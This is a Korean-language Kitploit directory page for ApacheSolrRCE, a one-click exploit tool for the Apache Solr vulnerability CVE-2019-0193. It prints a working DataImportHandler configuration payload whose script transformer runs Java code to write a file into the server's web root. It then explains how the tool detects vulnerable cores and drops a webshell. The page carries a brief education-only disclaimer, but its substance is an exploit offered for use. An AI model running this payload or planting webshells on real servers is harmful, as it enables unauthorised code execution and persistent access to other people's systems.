Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
ApacheSolrRCE — ApacheSolrRCE(CVE-2019-0193)원클릭 셸 작성. 원리는 코드 실행을 통해 java 파일 스트림으로 웹셸을 작성하는 방식입니다. | Kitploit
도구/GitHubGitHub/freefv/apachesolrrce
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubfreefv/apachesolrrce

ApacheSolrRCE

ApacheSolrRCE(CVE-2019-0193)원클릭 셸 작성. 원리는 코드 실행을 통해 java 파일 스트림으로 웹셸을 작성하는 방식입니다.

저장소 보기
13년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

프로젝트 선언

정보 보안 교육 및 교류 목적으로만 사용하십시오. 불법 테스트 및 공격에 사용하지 마십시오.

ApacheSolrRCE

ApacheSolrRCE(CVE-2019-0193) 원클릭 셸 작성, 원리는 코드 실행을 통해 Java 파일 스트림으로 웹셸을 작성하는 것입니다.

참고: 저자는 실력이 부족합니다. 버그가 있거나 다른 요구사항이 있다면 직접 코드를 다운로드하여 수정하십시오.

도구 설명

인터넷에 유포된 페이로드는 모두 명령 실행이며 웹셸을 올리기에 불편하므로 이 페이로드를 작성했습니다(123456이 반환되면 쓰기 성공을 의미).

root@kitploit:~
<dataConfig>
<dataSource name="streamsrc" type="ContentStreamDataSource" loggerLevel="TRACE" />
  <script><![CDATA[
          function poc(row){
var buf = new java.io.BufferedWriter(new java.io.FileWriter(java.net.URLDecoder.decode(java.lang.Thread.currentThread().getContextClassLoader().getResource("").getPath().toString().replaceAll("file:\/", "").split("WEB-INF")[0]+"1.txt")));buf.write(new java.lang.String(java.util.Base64.getDecoder().decode("MTIzNDU2")));buf.close();
row.put("title",123456);
return row;

}

]]></script>

<document>
    <entity
        stream="true"
        name="entity1"
        datasource="streamsrc1"
        processor="XPathEntityProcessor"
        rootEntity="true"
        forEach="/RDF/item"
        transformer="script:poc">
             <field column="title" xpath="/RDF/item/title" />
    </entity>
</document>
</dataConfig>

도구 사용법

먼저 '감지'를 클릭하여 core를 얻고 취약점이 있는지 확인합니다.

그런 다음 'getshell'을 클릭하면 됩니다.

참고: 웹셸을 shell 디렉터리에 넣으면 도구가 자동으로 웹셸을 드롭다운 목록에 로드합니다.

기본 프록시는 HTTP 프록시이며 포트는 8080입니다. 코드에 하드코딩되어 있으므로 필요하면 직접 컴파일하여 수정하십시오.

특별 감사

solr_exploit

도구 다운로드